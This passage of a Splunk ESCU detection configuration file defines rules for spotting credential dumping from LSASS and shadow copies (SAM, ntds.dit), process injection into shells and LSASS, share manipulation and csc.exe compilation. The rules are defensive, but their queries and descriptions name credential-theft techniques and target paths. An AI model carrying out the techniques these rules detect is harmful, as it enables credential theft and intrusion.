and nature of the detected activity. Next steps include reviewing the details of the process involving the net.exe command, including the user, parent process, and timestamps during the triage. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the source of the attack. action.notable.param.rule_title = Create or delete windows shares using net exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter` [ESCU - Create Remote Thread In Shell Application - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect suspicious process injection in command shell. This technique was seen in IcedID where it execute cmd.exe process to inject its shellcode as part of its execution as banking trojan. It is really uncommon to have a create remote thread execution in the following application. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect suspicious process injection in command shell. This technique was seen in IcedID where it execute cmd.exe process to inject its shellcode as part of its execution as banking trojan. It is really uncommon to have a create remote thread execution in the following application. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2024-01-31 action.escu.modification_date = 2024-01-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Create Remote Thread In Shell Application - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID", "Qakbot", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = process $process_name$ create a remote thread to shell app process $TargetImage$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Create Remote Thread In Shell Application - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Qakbot", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect suspicious process injection in command shell. This technique was seen in IcedID where it execute cmd.exe process to inject its shellcode as part of its execution as banking trojan. It is really uncommon to have a create remote thread execution in the following application. action.notable.param.rule_title = Create Remote Thread In Shell Application action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=8 TargetImage IN ("*\\cmd.exe", "*\\powershell*") | stats count min(_time) as firstTime max(_time) as lastTime by TargetImage TargetProcessId SourceProcessId EventCode StartAddress SourceImage dest |rename SourceImage as process_name| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `create_remote_thread_in_shell_application_filter` [ESCU - Create Remote Thread into LSASS - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS), which is a common tactic used by adversaries to steal user authentication credentials, known as credential dumping. The detection is made by leveraging Sysmon Event ID 8 logs and searches for processes that create remote threads in lsass.exe. This is an unusual activity that is generally linked to credential theft or credential dumping, which is a significant threat to network security. The detection is important because it helps to detect potential credential dumping attacks, which can result in significant damage to an organization's security. False positives might occur though the confidence level of this alert is high. There might be cases where legitimate tools can access LSASS and generate similar logs. Therefore, you must understand the broader context of such events and differentiate between legitimate activities and possible threats. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS), which is a common tactic used by adversaries to steal user authentication credentials, known as credential dumping. The detection is made by leveraging Sysmon Event ID 8 logs and searches for processes that create remote threads in lsass.exe. This is an unusual activity that is generally linked to credential theft or credential dumping, which is a significant threat to network security. The detection is important because it helps to detect potential credential dumping attacks, which can result in significant damage to an organization's security. False positives might occur though the confidence level of this alert is high. There might be cases where legitimate tools can access LSASS and generate similar logs. Therefore, you must understand the broader context of such events and differentiate between legitimate activities and possible threats. action.escu.how_to_implement = This search needs Sysmon Logs with a Sysmon configuration, which includes EventCode 8 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Other tools can access LSASS for legitimate reasons and generate an event. In these cases, tweaking the search may help eliminate noise. action.escu.creation_date = 2019-12-06 action.escu.modification_date = 2019-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Create Remote Thread into LSASS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = A process has created a remote thread into $TargetImage$ on $dest$. This behavior is indicative of credential dumping and should be investigated. action.risk.param._risk = [{"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Create Remote Thread into LSASS - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS), which is a common tactic used by adversaries to steal user authentication credentials, known as credential dumping. The detection is made by leveraging Sysmon Event ID 8 logs and searches for processes that create remote threads in lsass.exe. This is an unusual activity that is generally linked to credential theft or credential dumping, which is a significant threat to network security. The detection is important because it helps to detect potential credential dumping attacks, which can result in significant damage to an organization's security. False positives might occur though the confidence level of this alert is high. There might be cases where legitimate tools can access LSASS and generate similar logs. Therefore, you must understand the broader context of such events and differentiate between legitimate activities and possible threats. action.notable.param.rule_title = Create Remote Thread into LSASS action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=8 TargetImage=*lsass.exe | stats count min(_time) as firstTime max(_time) as lastTime by dest, EventCode, TargetImage, TargetProcessId | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `create_remote_thread_into_lsass_filter` [ESCU - Creation of lsass Dump with Taskmgr - Rule] action.escu = 0 action.escu.enabled = 1 description = Detect the hands on keyboard behavior of Windows Task Manager creating a process dump of lsass.exe. Upon this behavior occurring, a file write/modification will occur in the users profile under \AppData\Local\Temp. The dump file, lsass.dmp, cannot be renamed, however if the dump occurs more than once, it will be named lsass (2).dmp. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = Detect the hands on keyboard behavior of Windows Task Manager creating a process dump of lsass.exe. Upon this behavior occurring, a file write/modification will occur in the users profile under \AppData\Local\Temp. The dump file, lsass.dmp, cannot be renamed, however if the dump occurs more than once, it will be named lsass (2).dmp. action.escu.how_to_implement = This search requires Sysmon Logs and a Sysmon configuration, which includes EventCode 11 for detecting file create of lsass.dmp. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Administrators can create memory dumps for debugging purposes, but memory dumps of the LSASS process would be unusual. action.escu.creation_date = 2020-02-03 action.escu.modification_date = 2020-02-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Creation of lsass Dump with Taskmgr - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = $process_name$ was identified on endpoint $dest$ writing $TargetFilename$ to disk. This behavior is related to dumping credentials via Task Manager. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Creation of lsass Dump with Taskmgr - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Detect the hands on keyboard behavior of Windows Task Manager creating a process dump of lsass.exe. Upon this behavior occurring, a file write/modification will occur in the users profile under \AppData\Local\Temp. The dump file, lsass.dmp, cannot be renamed, however if the dump occurs more than once, it will be named lsass (2).dmp. action.notable.param.rule_title = Creation of lsass Dump with Taskmgr action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=11 process_name=taskmgr.exe TargetFilename=*lsass*.dmp | stats count min(_time) as firstTime max(_time) as lastTime by dest, object_category, process_name, TargetFilename | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `creation_of_lsass_dump_with_taskmgr_filter` [ESCU - Creation of Shadow Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legitimate administrator usage of Vssadmin or Wmic will create false positives. action.escu.creation_date = 2024-01-01 action.escu.modification_date = 2024-01-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Creation of Shadow Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Volt Typhoon"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to create a shadow copy to perform offline password cracking. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Creation of Shadow Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Monitor for signs that Vssadmin or Wmic has been used to create a shadow copy. action.notable.param.rule_title = Creation of Shadow Copy action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe Processes.process=*create* Processes.process=*shadow*) OR (Processes.process_name=wmic.exe Processes.process=*shadowcopy* Processes.process=*create*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_filter` [ESCU - Creation of Shadow Copy with wmic and powershell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the use of two specific tools, wmic and Powershell, to create a shadow copy to identify potential threats earlier and take appropriate actions to mitigate the risks. This detection is made by a Splunk query that searches for processes in the Endpoint.Processes data model where either the process name contains "wmic" or "Powershell" and the process command contains "shadowcopy" and "create". This detection is important because it suggests that an attacker is attempting to manipulate or access data in an unauthorized manner, which can lead to data theft, data manipulation, or other malicious activities. Attackers might use shadow copies to backup and exfiltrate sensitive data or to hide their tracks by restoring files to a previous state after an attack. Next steps include reviewing the user associated with the process, the process name, the original file name, the process command, and the destination of the process. Additionally, examine any relevant on-disk artifacts and review other concurrent processes to determine the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the use of two specific tools, wmic and Powershell, to create a shadow copy to identify potential threats earlier and take appropriate actions to mitigate the risks. This detection is made by a Splunk query that searches for processes in the Endpoint.Processes data model where either the process name contains "wmic" or "Powershell" and the process command contains "shadowcopy" and "create". This detection is important because it suggests that an attacker is attempting to manipulate or access data in an unauthorized manner, which can lead to data theft, data manipulation, or other malicious activities. Attackers might use shadow copies to backup and exfiltrate sensitive data or to hide their tracks by restoring files to a previous state after an attack. Next steps include reviewing the user associated with the process, the process name, the original file name, the process command, and the destination of the process. Additionally, examine any relevant on-disk artifacts and review other concurrent processes to determine the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Legtimate administrator usage of wmic to create a shadow copy. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Creation of Shadow Copy with wmic and powershell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping", "Living Off The Land", "Volt Typhoon"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to create a shadow copy to perform offline password cracking. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Creation of Shadow Copy with wmic and powershell - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Living Off The Land", "Volt Typhoon"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the use of two specific tools, wmic and Powershell, to create a shadow copy to identify potential threats earlier and take appropriate actions to mitigate the risks. This detection is made by a Splunk query that searches for processes in the Endpoint.Processes data model where either the process name contains "wmic" or "Powershell" and the process command contains "shadowcopy" and "create". This detection is important because it suggests that an attacker is attempting to manipulate or access data in an unauthorized manner, which can lead to data theft, data manipulation, or other malicious activities. Attackers might use shadow copies to backup and exfiltrate sensitive data or to hide their tracks by restoring files to a previous state after an attack. Next steps include reviewing the user associated with the process, the process name, the original file name, the process command, and the destination of the process. Additionally, examine any relevant on-disk artifacts and review other concurrent processes to determine the source of the attack. action.notable.param.rule_title = Creation of Shadow Copy with wmic and powershell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell` Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter` [ESCU - Credential Dumping via Copy Command from Shadow Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the use of the copy command to dump credentials from a shadow copy so that you can detect potential threats earlier and mitigate the risks associated with credential dumping. The detection is made by using a Splunk query to search for specific processes that indicate credential dumping activity. The query looks for processes with command lines that include references to certain files, such as "sam", "security", "system", and "ntds.dit", located in system directories like "system32" or "windows". The detection is important because it suggests that an attacker is attempting to extract credentials from a shadow copy. Credential dumping is a common technique used by attackers to obtain sensitive login information and gain unauthorized access to systems to escalate privileges, move laterally within the network, or gain unauthorized access to sensitive data. False positives might occur since legitimate processes might also reference these files. During triage, it is crucial to review the process details, including the source and the command that is run. Additionally, you must capture and analyze any relevant on-disk artifacts and investigate concurrent processes to determine the source of the attack action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the use of the copy command to dump credentials from a shadow copy so that you can detect potential threats earlier and mitigate the risks associated with credential dumping. The detection is made by using a Splunk query to search for specific processes that indicate credential dumping activity. The query looks for processes with command lines that include references to certain files, such as "sam", "security", "system", and "ntds.dit", located in system directories like "system32" or "windows". The detection is important because it suggests that an attacker is attempting to extract credentials from a shadow copy. Credential dumping is a common technique used by attackers to obtain sensitive login information and gain unauthorized access to systems to escalate privileges, move laterally within the network, or gain unauthorized access to sensitive data. False positives might occur since legitimate processes might also reference these files. During triage, it is crucial to review the process details, including the source and the command that is run. Additionally, you must capture and analyze any relevant on-disk artifacts and investigate concurrent processes to determine the source of the attack action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Credential Dumping via Copy Command from Shadow Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to copy SAM and NTDS.dit for offline password cracking. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Credential Dumping via Copy Command from Shadow Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the use of the copy command to dump credentials from a shadow copy so that you can detect potential threats earlier and mitigate the risks associated with credential dumping. The detection is made by using a Splunk query to search for specific processes that indicate credential dumping activity. The query looks for processes with command lines that include references to certain files, such as "sam", "security", "system", and "ntds.dit", located in system directories like "system32" or "windows". The detection is important because it suggests that an attacker is attempting to extract credentials from a shadow copy. Credential dumping is a common technique used by attackers to obtain sensitive login information and gain unauthorized access to systems to escalate privileges, move laterally within the network, or gain unauthorized access to sensitive data. False positives might occur since legitimate processes might also reference these files. During triage, it is crucial to review the process details, including the source and the command that is run. Additionally, you must capture and analyze any relevant on-disk artifacts and investigate concurrent processes to determine the source of the attack action.notable.param.rule_title = Credential Dumping via Copy Command from Shadow Copy action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\system32\\config\\sam* OR Processes.process=*\\system32\\config\\security* OR Processes.process=*\\system32\\config\\system* OR Processes.process=*\\windows\\ntds\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter` [ESCU - Credential Dumping via Symlink to Shadow Copy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of a symlink to a shadow copy to identify potential threats earlier and mitigate the risks associated with symlink creation to shadow copies. The detection is made by using a Splunk query that searches for processes with commands containing "mklink" and "HarddiskVolumeShadowCopy". This analytic retrieves information such as the destination, user, process name, process ID, parent process, original file name, and parent process ID from the Endpoint.Processes data model. The detection is important because it indicates potential malicious activity since attackers might use this technique to manipulate or delete shadow copies, which are used for system backup and recovery. This detection helps to determine if an attacker is attempting to cover their tracks or prevent data recovery in the event of an incident. The impact of such an attack can be significant since it can hinder incident response efforts, prevent data restoration, and potentially lead to data loss or compromise. Next steps include reviewing the details of the process, such as the destination and the user responsible for creating the symlink. Additionally, you must examine the parent process, any relevant on-disk artifacts, and concurrent processes to identify the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation of a symlink to a shadow copy to identify potential threats earlier and mitigate the risks associated with symlink creation to shadow copies. The detection is made by using a Splunk query that searches for processes with commands containing "mklink" and "HarddiskVolumeShadowCopy". This analytic retrieves information such as the destination, user, process name, process ID, parent process, original file name, and parent process ID from the Endpoint.Processes data model. The detection is important because it indicates potential malicious activity since attackers might use this technique to manipulate or delete shadow copies, which are used for system backup and recovery. This detection helps to determine if an attacker is attempting to cover their tracks or prevent data recovery in the event of an incident. The impact of such an attack can be significant since it can hinder incident response efforts, prevent data restoration, and potentially lead to data loss or compromise. Next steps include reviewing the details of the process, such as the destination and the user responsible for creating the symlink. Additionally, you must examine the parent process, any relevant on-disk artifacts, and concurrent processes to identify the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Credential Dumping via Symlink to Shadow Copy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Credential Dumping"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to create symlink to a shadow copy to grab credentials. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Credential Dumping via Symlink to Shadow Copy - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of a symlink to a shadow copy to identify potential threats earlier and mitigate the risks associated with symlink creation to shadow copies. The detection is made by using a Splunk query that searches for processes with commands containing "mklink" and "HarddiskVolumeShadowCopy". This analytic retrieves information such as the destination, user, process name, process ID, parent process, original file name, and parent process ID from the Endpoint.Processes data model. The detection is important because it indicates potential malicious activity since attackers might use this technique to manipulate or delete shadow copies, which are used for system backup and recovery. This detection helps to determine if an attacker is attempting to cover their tracks or prevent data recovery in the event of an incident. The impact of such an attack can be significant since it can hinder incident response efforts, prevent data restoration, and potentially lead to data loss or compromise. Next steps include reviewing the details of the process, such as the destination and the user responsible for creating the symlink. Additionally, you must examine the parent process, any relevant on-disk artifacts, and concurrent processes to identify the source of the attack. action.notable.param.rule_title = Credential Dumping via Symlink to Shadow Copy action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter` [ESCU - CSC Net On The Fly Compilation - Rule] action.escu = 0 action.escu.enabled = 1 description = this analytic is to detect a suspicious compile before delivery approach of .net compiler csc.exe. This technique was seen in several adversaries, malware and even in red teams to take advantage the csc.exe .net compiler tool to compile on the fly a malicious .net code to evade detection from security product. This is a good hunting query to check further the file or process created after this event and check the file path that passed to csc.exe which is the .net code. Aside from that, powershell is capable of using this compiler in executing .net code in a powershell script so filter on that case is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.004", "T1027"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this analytic is to detect a suspicious compile before delivery approach of .net compiler csc.exe. This technique was seen in several adversaries, malware and even in red teams to take advantage the csc.exe .net compiler tool to compile on the fly a malicious .net code to evade detection from security product. This is a good hunting query to check further the file or process created after this event and check the file path that passed to csc.exe 